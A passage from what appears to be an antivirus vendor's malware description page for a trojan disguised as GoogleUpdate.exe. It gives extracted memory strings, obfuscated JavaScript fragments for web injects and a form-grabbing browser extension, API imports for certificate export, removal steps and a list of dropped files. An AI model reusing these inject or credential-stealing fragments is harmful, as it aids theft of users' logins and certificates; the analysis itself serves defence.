Code(l);if(f!=64){a=a String.fromCharCode(j)}if(e!=64){a=a String.fromCharCode(g)}}a=Base64v2_utf8_decode(a);return a}function ParseInjects(d){var a=Base64v2_decode(d);var f=new Array();f=a.split("|$");var c=new Array();var e=1;TOT_INJ=f.length-1;for(e;e<f.length;e  ){var b=f[e].substr(0,f[e].length-2);c=b.split("|^");INJURL[e-1]=c[0];INJECT[e-1]=c[1].replace("_HOSTID_",HID)}INJURL[e-1]=false}function iXHRstateChange(a){if(a.readyState!=4){return}if(a.status!=200){return}var b=a.responseText;if(b==null){return}if((b[42]!=";")||(b[0]!="G")||(b[1]!="I")||(b[2]!="F")||(b[3]!="8")||(b[4]!="9")||(b
Extension%u=%s\%s
Qrsvp.exe
chrome.exe
%s\%s\Main
>SOFTWARE\Mozilla\Mozilla Firefox
47PeekNamedPipe
09WinExec
48CreatePipe
pstorec.dll
s-%X.
R%u.%u.%u
manifest.json
background.js
content.js
\Google\Chrome\User Data\Default\
\Google\Chrome\Application
\FileZilla\sitemanager.xml
\p*.dll
Lion|subm|submit|||substring|userAgent|navigator|this|form|value|blank|true|addEventListener|greeting|sendMessage|extension|chrome|CHROME|href|location|Chrom|return|FORM|replace|textContent|else|checked|checkbox|radio|button|reset|image|input'.split('|'),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('1 f=h.l("x");9 k(c){1 b=c.l("V");1 d="";8(1 a=0;a<b.7;a  ){3(b.4=="U"){5}3(b.4=="T"){5}3(b.4=="q"){5}3
rl=="chrome://cache/"){chrome.tabs.update(a,{url:"chrome://predictors/"})}if(b.url=="chrome://net-internals/"){chrome.tabs.update(a,{url:"chrome://downloads/"})}if(b.url=="chrome://dns/"){chrome.tabs.update(a,{url:"chrome://downloads/"})}if(b.url=="chrome://about/"){chrome.tabs.update(a,{url:"chrome://chrome/"})}if(b.url=="chrome://inspect/"){chrome.tabs.update(a,{url:"chrome://ipc/"})}if(b.url=="chrome://tasks/"){chrome.tabs.update(a,{url:"chrome://sessions/"})}if(b.url=="chrome://chrome-urls/"){chrome.tabs.update(a,{url:"chrome://chrome/history/"})}});
ole32.dll
2\msvcr100.dll
\mozcrt19.dll
 oleaut32.dll
CertFreeCertificateContext
CryptFindCertificateKeyProvInfo
(CertOpenSystemStoreA
bCertEnumCertificatesInStore
CertAddCertificateContextToStore
RCertGetNameStringA
CertOpenStore
CertCloseStore
PFXExportCertStore
crypt32.dll
shell32.dll
%s\f%u%s.xsl
{%s\kf%ulz32.dll
;%s\wsr%uzt32.dll
%s\dfl%uz32.dll
%s\i%u%s.dat
%s\%s%u.nls
=\1.0_0\

%original file name%.exe_3308_rwx_10001000_0002C000:




__MSVCRT_HEAP_SELECT
user32.dll
zcÁ
c:\%original file name%.exe
GetWindowsDirectoryA
GetProcessHeap
GetCPInfo
RegOpenKeyExW
RegOpenKeyExA
RegCloseKey
EnumWindows
.text
`.rdata
@.data
.rsrc
@.reloc
MSVCRTl

UI0Detect.exe_1988:




.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
msvcrt.dll
WTSAPI32.dll
VERSION.dll
WINSTA.dll
SHELL32.dll
SHLWAPI.dll
COMCTL32.dll
UI0Detect.pdb
ReportEventW
GetProcessHeap
EnumWindows
GetProcessWindowStation
_acmdln
_amsg_exit
ntdll.dll
name="Microsoft.Windows.S0Viewer.UI0Detect"
version="5.1.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel
KEYWH
5 5$5(5,5054585<5@5
9 9$9<9@9\9`9
{EF0F4B22-39FC-4902-A2FA-57A0730A2A7C}
comctl32.dll
\StringFileInfo\xx\CompanyName
{EF0F4B22-39FC-4902-A2FA-57A0730A2A7D}
UI0Detect.exe %Iu
2-39FC-4902-A2FA-57A0730A2A7C
6.1.7600.16385 (win7_rtm.090713-1255)
UI0Detect.exe
Windows
Operating System
6.1.7600.16385

GoogleUpdate.exe_3580_rwx_00428000_00033000:




.text
.data
.idata
.reloc
.edata
.xyCS5F
w..BI"[
O@e3F.AYW%
MES.uX
r.GOf{
ha.SS|`6
@!.TZ]8
GpP*.tJ!U&,
0c~Ngx]o;l|v1Sd3.EU)px_X ZW_@
5cÊ
\%sfx<
x;.DF&
.kQxlR-uslf&N|=7
rF.clIJ1
KERNEL32.dll
CRTDLL.DLL
7$80858{9
5!5/555~5
4-494?4\4|4
kkqvx_.dll

GoogleUpdate.exe_3580_rwx_004A4000_00125000:




.vmp0
sfc_os.dll
w..BI"[
O@e3F.AYW%
32RegSetKeySecurity
00RegOpenKeyExA
02RegCreateKeyExA
04RegCloseKey
31RegEnumKeyExA
advapi32.dll
22EnumDesktopWindows
buser32.dll
r.GOf{
ha.SS|`6
@!.TZ]8
sfc.dll
Osfc.dll
crtdll.dll
GpP*.tJ!U&,
0c~Ngx]o;l|v1Sd3.EU)px_X ZW_@
5cÊ
\%sfx<
x;.DF&
.kQxlR-uslf&N|=7
rF.clIJ1
47PeekNamedPipe
09WinExec
48CreatePipe
pstorec.dll
$%s_%u
ole32.dll
 oleaut32.dll
CertFreeCertificateContext
CryptFindCertificateKeyProvInfo
(CertOpenSystemStoreA
bCertEnumCertificatesInStore
CertAddCertificateContextToStore
RCertGetNameStringA
CertOpenStore
CertCloseStore
PFXExportCertStore
crypt32.dll
shell32.dll

svchost.exe_2680:




.text
`.data
.rsrc
@.reloc
msvcrt.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
KERNEL32.dll
NTDLL.DLL
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
RPCRT4.dll
ole32.dll
ntdll.dll
_amsg_exit
RegCloseKey
RegOpenKeyExW
GetProcessHeap
svchost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Services.SvcHost"
<description>Host Process for Windows Services</description>
<requestedExecutionLevel
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost
\PIPE\
Host Process for Windows Services
6.1.7600.16385 (win7_rtm.090713-1255)
svchost.exe
Windows
Operating System
6.1.7600.16385

GoogleUpdate.exe_764:




.text
`.data
.idata
@.gfids
@.rsrc
@.reloc
B.vmp0
operator
operator ""
%S#[k
GoogleUpdate_unsigned.pdb
.CRT$XCA
.CRT$XCAA
.CRT$XCL
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.text$di
.text$mn
.text$yd
.xdata$x
.data
.idata$5
.idata$2
.idata$3
.idata$4
.idata$6
.gfids$x
.gfids$y
.rsrc$01
.rsrc$02
.hxY@
RegOpenKeyExW
ADVAPI32.dll
GetProcessHeap
KERNEL32.dll
SHELL32.dll
USER32.dll
SHLWAPI.dll
GetCPInfo
<asmv3:windowsSettings xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">
</asmv3:windowsSettings>
<requestedExecutionLevel level="asInvoker" />
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
###7777_{
###____777
###````87{
0 0$0004080
?&?2?@?}?
2 2$2(2,2|9
0	0D0
.reloc
.edata
.xyCS5F
w..BI"[
O@e3F.AYW%
MES.uX
r.GOf{
ha.SS|`6
@!.TZ]8
GpP*.tJ!U&,
0c~Ngx]o;l|v1Sd3.EU)px_X ZW_@
5cÊ
\%sfx<
x;.DF&
.kQxlR-uslf&N|=7
rF.clIJ1
CRTDLL.DLL
7$80858{9
5!5/555~5
4-494?4\4|4
kkqvx_.dll
..qL\\K)6
..hX\\
..DX\\
..xX\\
(.sX\\
(.kX\\
..xX\\KK
..sL\\KP
..xL\\
..xL\\K
..xL\\KQ>
..nY\\Kj
..jL\\
*7.sX\\
..sX\\
..pL\\K
..pL\\Kd
..mL\\KO
..gX\\K
]\ .cX\\
\\*&3_\\
..lH\\
]\*&_]_\
]\*&'^\\
]\*&_]\\
(&{]\\*  
.dWQ•<y;e
.a5>.xjV("H
kCK~un9i.SC{0
GyCA9:!x.UZig]XIN^
_SS%C
6??/*UDp{
:% %9/';
@SU}GU.emm{FCm2
JmAqJL.RaZ^AmieyMR
TvkF`.mc~nV}I
fOWU.hgHJzap[
_j_^a~y6.wNcLVF][c
T@@_`xy7.vNpNF@ZP\
}%dThyY[B,
.AiwNx
g{w~#p.Xtq
f0 c.Jn<VYYO
.vmp0
sfc_os.dll
32RegSetKeySecurity
00RegOpenKeyExA
02RegCreateKeyExA
04RegCloseKey
31RegEnumKeyExA
advapi32.dll
22EnumDesktopWindows
buser32.dll
sfc.dll
Osfc.dll
crtdll.dll
47PeekNamedPipe
09WinExec
48CreatePipe
pstorec.dll
$%s_%u
ole32.dll
 oleaut32.dll
CertFreeCertificateContext
CryptFindCertificateKeyProvInfo
(CertOpenSystemStoreA
bCertEnumCertificatesInStore
CertAddCertificateContextToStore
RCertGetNameStringA
CertOpenStore
CertCloseStore
PFXExportCertStore
crypt32.dll
shell32.dll
mscoree.dll
ext-ms-win-ntuser-windowstation-l1-1-0
kernel32.dll
GoogleUpdate.exe
goopdate.dll
Software\Google\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}
%Program Files%\Google\Update\GoogleUpdate.exe
1.3.31.5
2007-2010
2007-2010

GoogleUpdate.exe_764_rwx_00428000_00033000:




.text
.data
.idata
.reloc
.edata
.xyCS5F
w..BI"[
O@e3F.AYW%
MES.uX
r.GOf{
ha.SS|`6
@!.TZ]8
GpP*.tJ!U&,
0c~Ngx]o;l|v1Sd3.EU)px_X ZW_@
5cÊ
\%sfx<
x;.DF&
.kQxlR-uslf&N|=7
rF.clIJ1
KERNEL32.dll
CRTDLL.DLL
7$80858{9
5!5/555~5
4-494?4\4|4
kkqvx_.dll

GoogleUpdate.exe_764_rwx_004A4000_00125000:




.vmp0
sfc_os.dll
w..BI"[
O@e3F.AYW%
32RegSetKeySecurity
00RegOpenKeyExA
02RegCreateKeyExA
04RegCloseKey
31RegEnumKeyExA
advapi32.dll
22EnumDesktopWindows
buser32.dll
r.GOf{
ha.SS|`6
@!.TZ]8
sfc.dll
Osfc.dll
crtdll.dll
GpP*.tJ!U&,
0c~Ngx]o;l|v1Sd3.EU)px_X ZW_@
5cÊ
\%sfx<
x;.DF&
.kQxlR-uslf&N|=7
rF.clIJ1
47PeekNamedPipe
09WinExec
48CreatePipe
pstorec.dll
$%s_%u
ole32.dll
 oleaut32.dll
CertFreeCertificateContext
CryptFindCertificateKeyProvInfo
(CertOpenSystemStoreA
bCertEnumCertificatesInStore
CertAddCertificateContextToStore
RCertGetNameStringA
CertOpenStore
CertCloseStore
PFXExportCertStore
crypt32.dll
shell32.dll






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    GoogleUpdate.exe:3964
    GoogleUpdate.exe:1732
    WerFault.exe:2860
    GoogleCrashHandler.exe:3160
    wermgr.exe:1872
    

    2. 

  2. Delete the original Trojan file.
    3. 

  3. Delete or disinfect the following files created/modified by the Trojan:
    

    %Program Files%\WinPcap\rpcapd.vir (618 bytes)
    %Program Files%\WinPcap\rpcapd.exe (4185 bytes)
    C:\Windows\Temp\WER70CF.tmp.mdmp (253992 bytes)
    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_infocard.exe_8060ea5cf72f7ed4ea9dabaad12d7232cfb73317_cab_0b387168\WER70CF.tmp.mdmp (15278 bytes)
    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_infocard.exe_8060ea5cf72f7ed4ea9dabaad12d7232cfb73317_cab_0b387168\WER68A3.tmp.hdmp (175902 bytes)
    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_infocard.exe_8060ea5cf72f7ed4ea9dabaad12d7232cfb73317_cab_0b387168\WER6893.tmp.WERInternalMetadata.xml (3 bytes)
    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_infocard.exe_8060ea5cf72f7ed4ea9dabaad12d7232cfb73317_cab_0b387168\Report.wer (171900 bytes)
    C:\Windows\Temp\WER68A3.tmp.hdmp (625104 bytes)
    C:\Windows\Temp\WER67E6.tmp.appcompat.txt (12806 bytes)
    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_infocard.exe_8060ea5cf72f7ed4ea9dabaad12d7232cfb73317_cab_0b387168\WER67E6.tmp.appcompat.txt (31 bytes)
    C:\Windows\Temp\WER6893.tmp.WERInternalMetadata.xml (53648 bytes)
    C:\Windows\ehome\ehrecvr.vir (1 bytes)
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.vir (597 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab47C9.tmp (51 bytes)
    %Program Files%\Google\Update\GoogleUpdate.exe (4185 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\extensions\{ec9032c7-c20a-464f-7b0e-13a3a9e97385}\chrome.manifest (522 bytes)
    %Program Files%\Windows Media Player\wmpnetwk.vir (1 bytes)
    C:\Windows\Microsoft.NET\Framework\v3.0\windows communication foundation\infocard.exe (8657 bytes)
    %Program Files%\Windows Media Player\wmpnetwk.exe (10177 bytes)
    C:\Windows\ehome\ehrecvr.exe (7433 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\extensions\{ec9032c7-c20a-464f-7b0e-13a3a9e97385}\chrome\content.jar (8 bytes)
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe (4185 bytes)
    %Program Files%\Common Files\System\symsrv.dll (138 bytes)
    C:\Windows\ehome\ehsched.exe (4185 bytes)
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.vir (568 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\verify[1].htm (17 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\extensions.ini (312 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WR9EBAB457N7WZ2G6KN2.temp (196 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E7EC0C85688F4738F3BE49B104BA67 (782 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\app_cc_pro_trialkey[1].htm (24 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar47CA.tmp (2712 bytes)
    %Program Files%\Internet Explorer\iexplore.exe (7971 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\extensions\{ec9032c7-c20a-464f-7b0e-13a3a9e97385}\install.rdf (874 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dlddmedljhmbgdhapibnagaanenmajcm\1.0_0\manifest.json (321 bytes)
    C:\Windows\ehome\ehsched.vir (602 bytes)
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe (3361 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\extensions\{ec9032c7-c20a-464f-7b0e-13a3a9e97385}\components\red.js (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dlddmedljhmbgdhapibnagaanenmajcm\1.0_0\background.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\ACF244F1A10D4DBED0D88EBA0C43A9B5_16756CC7371BB76A269719AA1471E96C (1476 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\ACF244F1A10D4DBED0D88EBA0C43A9B5_16756CC7371BB76A269719AA1471E96C (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E7EC0C85688F4738F3BE49B104BA67 (260 bytes)
    %Program Files%\Google\Update\googleupdate.vir (650 bytes)
    C:\Windows\Microsoft.NET\Framework\v3.0\windows communication foundation\infocard.vir (1 bytes)
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.vir (538 bytes)
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe (3361 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dlddmedljhmbgdhapibnagaanenmajcm\1.0_0\content.js (1 bytes)
    %Program Files%\Internet Explorer\iexplore.vir (1 bytes)
    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_infocard.exe_8060ea5cf72f7ed4ea9dabaad12d7232cfb73317_cab_0b387168\Report.wer.tmp (175218 bytes)
    

    4. 

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    5. 

  5. Reboot the computer.
    6. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2025 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now